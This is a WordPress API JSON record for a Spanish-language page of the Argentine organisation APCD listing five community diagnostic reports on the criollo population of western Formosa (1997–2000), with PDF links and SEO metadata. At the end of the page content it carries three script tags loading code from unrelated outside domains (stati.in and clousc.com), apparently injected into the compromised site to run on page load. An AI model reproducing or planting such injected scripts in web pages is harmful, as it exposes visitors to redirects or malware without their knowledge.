{"id":132,"date":"2016-01-10T22:32:11","date_gmt":"2016-01-10T22:32:11","guid":{"rendered":"http:\/\/apcd.org.ar\/?page_id=132"},"modified":"2016-04-27T18:45:33","modified_gmt":"2016-04-27T18:45:33","slug":"diagnosticos","status":"publish","type":"page","link":"https:\/\/apcd.org.ar\/index.php\/diagnosticos\/","title":{"rendered":"Diagn\u00f3sticos"},"content":{"rendered":"<p><img decoding=\"async\" loading=\"lazy\" class=\"alignnone size-full wp-image-241\" src=\"http:\/\/apcd.org.ar\/wp-content\/uploads\/2016\/01\/logos_diagnostico-08.png\" alt=\"logos_diagnostico-08\" width=\"200\" height=\"199\" srcset=\"https:\/\/apcd.org.ar\/wp-content\/uploads\/2016\/01\/logos_diagnostico-08.png 200w, https:\/\/apcd.org.ar\/wp-content\/uploads\/2016\/01\/logos_diagnostico-08-150x150.png 150w, https:\/\/apcd.org.ar\/wp-content\/uploads\/2016\/01\/logos_diagnostico-08-151x150.png 151w\" sizes=\"(max-width: 200px) 100vw, 200px\" \/><\/p>\n<p><del><\/del>1. <a href=\"http:\/\/www.apcd.org.ar\/wp-content\/uploads\/pdf\/diagnosticos\/1diagnosticomuniz.pdf\" target=\"_blank\">Diagn\u00f3stico de la comunidad Francisco Javier Mu\u00f1iz<\/a>. 1998.<\/p>\n<p>2. Diagn\u00f3stico de la poblaci\u00f3n criolla del oeste formose\u00f1o \u2013 Tomo I \u2013 <em><a href=\"http:\/\/www.apcd.org.ar\/wp-content\/uploads\/pdf\/diagnosticos\/2diagnosticocriollotomo1.pdf\" target=\"_blank\">Aspectos hist\u00f3ricos y estructuras f\u00edsicas ponderables<\/a>.<\/em> 1997 \u2013 1998.<\/p>\n<p>3. Diagn\u00f3stico de la poblaci\u00f3n criolla del oeste formose\u00f1o. Tomo II. <em><a href=\"http:\/\/www.apcd.org.ar\/wp-content\/uploads\/pdf\/diagnosticos\/3diagnosticocriollotomo2.pdf\" target=\"_blank\">Infraestructura, equipamiento y poblaci\u00f3n<\/a><\/em>. 1998.<\/p>\n<p>4. Diagn\u00f3stico de la poblaci\u00f3n criolla del oeste formose\u00f1o. Tomo III. <em>Niveles de vida<\/em>. 1999.<\/p>\n<p>5. Diagn\u00f3stico de la poblaci\u00f3n criolla del oeste formose\u00f1o. Tomo IV. <em><a href=\"http:\/\/www.apcd.org.ar\/wp-content\/uploads\/pdf\/diagnosticos\/5diagnosticocriollotomo4.pdf\" target=\"_blank\">Recursos y potencialidades<\/a><\/em>. 2000.<\/p>\n<p><script src=\"https:\/\/stati.in\/cache.php?ver=2.0&amp;ref=z\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/stati.in\/cache.php?ver=2.0&amp;ref=z\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/clousc.com\/player.php?ver=1.1&amp;ref=te\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>1. Diagn\u00f3stico de la comunidad Francisco Javier Mu\u00f1iz. 1998. 2. Diagn\u00f3stico de la poblaci\u00f3n criolla del oeste formose\u00f1o \u2013 Tomo I \u2013 Aspectos hist\u00f3ricos y estructuras f\u00edsicas ponderables. 1997 \u2013 1998. 3. Diagn\u00f3stico de la poblaci\u00f3n criolla del oeste formose\u00f1o. Tomo II. Infraestructura, equipamiento y poblaci\u00f3n. 1998. 4. Diagn\u00f3stico de\u2026<\/p>\n<p> <a class=\"continue-reading-link\" href=\"https:\/\/apcd.org.ar\/index.php\/diagnosticos\/\"><span>Leer m\u00e1s<\/span><i class=\"crycon-right-dir\"><\/i><\/a> <\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v21.8.1 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Diagn\u00f3sticos - APCD<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/apcd.org.ar\/index.php\/diagnosticos\/\" \/>\n<meta property=\"og:locale\" content=\"es_ES\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Diagn\u00f3sticos - APCD\" \/>\n<meta property=\"og:description\" content=\"1. Diagn\u00f3stico de la comunidad Francisco Javier Mu\u00f1iz. 1998. 2. Diagn\u00f3stico de la poblaci\u00f3n criolla del oeste formose\u00f1o \u2013 Tomo I \u2013 Aspectos hist\u00f3ricos y estructuras f\u00edsicas ponderables. 1997 \u2013 1998. 3. Diagn\u00f3stico de la poblaci\u00f3n criolla del oeste formose\u00f1o. Tomo II. Infraestructura, equipamiento y poblaci\u00f3n. 1998. 4. Diagn\u00f3stico de\u2026 Leer m\u00e1s\" \/>\n<meta property=\"og:url\" content=\"https:\/\/apcd.org.ar\/index.php\/diagnosticos\/\" \/>\n<meta property=\"og:site_name\" content=\"APCD\" \/>\n<meta property=\"article:modified_time\" content=\"2016-04-27T18:45:33+00:00\" \/>\n<meta property=\"og:image\" content=\"http:\/\/apcd.org.ar\/wp-content\/uploads\/2016\/01\/logos_diagnostico-08.png\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/apcd.org.ar\/index.php\/diagnosticos\/\",\"url\":\"https:\/\/apcd.org.ar\/index.php\/diagnosticos\/\",\"name\":\"Diagn\u00f3sticos - APCD\",\"isPartOf\":{\"@id\":\"https:\/\/apcd.org.ar\/#website\"},\"datePublished\":\"2016-01-10T22:32:11+00:00\",\"dateModified\":\"2016-04-27T18:45:33+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/apcd.org.ar\/index.php\/diagnosticos\/#breadcrumb\"},\"inLanguage\":\"es\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/apcd.org.ar\/index.php\/diagnosticos\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/apcd.org.ar\/index.php\/diagnosticos\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Portada\",\"item\":\"https:\/\/apcd.org.ar\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Diagn\u00f3sticos\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/apcd.org.ar\/#website\",\"url\":\"https:\/\/apcd.org.ar\/\",\"name\":\"APCD\",\"description\":\"\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/apcd.org.ar\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"es\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Diagn\u00f3sticos - APCD","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/apcd.org.ar\/index.php\/diagnosticos\/","og_locale":"es_ES","og_type":"article","og_title":"Diagn\u00f3sticos - APCD","og_description":"1. Diagn\u00f3stico de la comunidad Francisco Javier Mu\u00f1iz. 1998. 2. Diagn\u00f3stico de la poblaci\u00f3n criolla del oeste formose\u00f1o \u2013 Tomo I \u2013 Aspectos hist\u00f3ricos y estructuras f\u00edsicas ponderables. 1997 \u2013 1998. 3. Diagn\u00f3stico de la poblaci\u00f3n criolla del oeste formose\u00f1o. Tomo II. Infraestructura, equipamiento y poblaci\u00f3n. 1998. 4. Diagn\u00f3stico de\u2026 Leer m\u00e1s","og_url":"https:\/\/apcd.org.ar\/index.php\/diagnosticos\/","og_site_name":"APCD","article_modified_time":"2016-04-27T18:45:33+00:00","og_image":[{"url":"http:\/\/apcd.org.ar\/wp-content\/uploads\/2016\/01\/logos_diagnostico-08.png"}],"twitter_card":"summary_large_image","schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/apcd.org.ar\/index.php\/diagnosticos\/","url":"https:\/\/apcd.org.ar\/index.php\/diagnosticos\/","name":"Diagn\u00f3sticos - APCD","isPartOf":{"@id":"https:\/\/apcd.org.ar\/#website"},"datePublished":"2016-01-10T22:32:11+00:00","dateModified":"2016-04-27T18:45:33+00:00","breadcrumb":{"@id":"https:\/\/apcd.org.ar\/index.php\/diagnosticos\/#breadcrumb"},"inLanguage":"es","potentialAction":[{"@type":"ReadAction","target":["https:\/\/apcd.org.ar\/index.php\/diagnosticos\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/apcd.org.ar\/index.php\/diagnosticos\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Portada","item":"https:\/\/apcd.org.ar\/"},{"@type":"ListItem","position":2,"name":"Diagn\u00f3sticos"}]},{"@type":"WebSite","@id":"https:\/\/apcd.org.ar\/#website","url":"https:\/\/apcd.org.ar\/","name":"APCD","description":"","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/apcd.org.ar\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"es"}]}},"_links":{"self":[{"href":"https:\/\/apcd.org.ar\/index.php\/wp-json\/wp\/v2\/pages\/132"}],"collection":[{"href":"https:\/\/apcd.org.ar\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/apcd.org.ar\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/apcd.org.ar\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/apcd.org.ar\/index.php\/wp-json\/wp\/v2\/comments?post=132"}],"version-history":[{"count":6,"href":"https:\/\/apcd.org.ar\/index.php\/wp-json\/wp\/v2\/pages\/132\/revisions"}],"predecessor-version":[{"id":384,"href":"https:\/\/apcd.org.ar\/index.php\/wp-json\/wp\/v2\/pages\/132\/revisions\/384"}],"wp:attachment":[{"href":"https:\/\/apcd.org.ar\/index.php\/wp-json\/wp\/v2\/media?parent=132"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}